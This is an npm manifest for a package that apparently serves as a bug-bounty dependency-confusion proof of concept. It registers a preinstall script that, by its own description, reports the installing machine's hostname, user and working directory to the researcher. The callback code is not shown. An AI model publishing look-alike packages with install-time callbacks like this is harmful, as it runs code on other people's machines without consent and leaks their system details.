{
  "name": "@iana-rzms/bff-sdk",
  "version": "1.0.0",
  "description": "AUTHORIZED SECURITY-RESEARCH PLACEHOLDER — dependency-confusion PoC for the ICANN bug bounty program. Namespace defensively reserved. Performs only a benign install-time callback (hostname/user/cwd) to confirm resolution; takes no other action. Not a functional package.",
  "license": "MIT",
  "main": "index.js",
  "types": "index.d.ts",
  "scripts": {
    "preinstall": "node preinstall.js"
  },
  "keywords": ["security-research", "poc", "dependency-confusion", "placeholder"],
  "files": ["index.js", "index.d.ts", "preinstall.js", "README.md"]
}
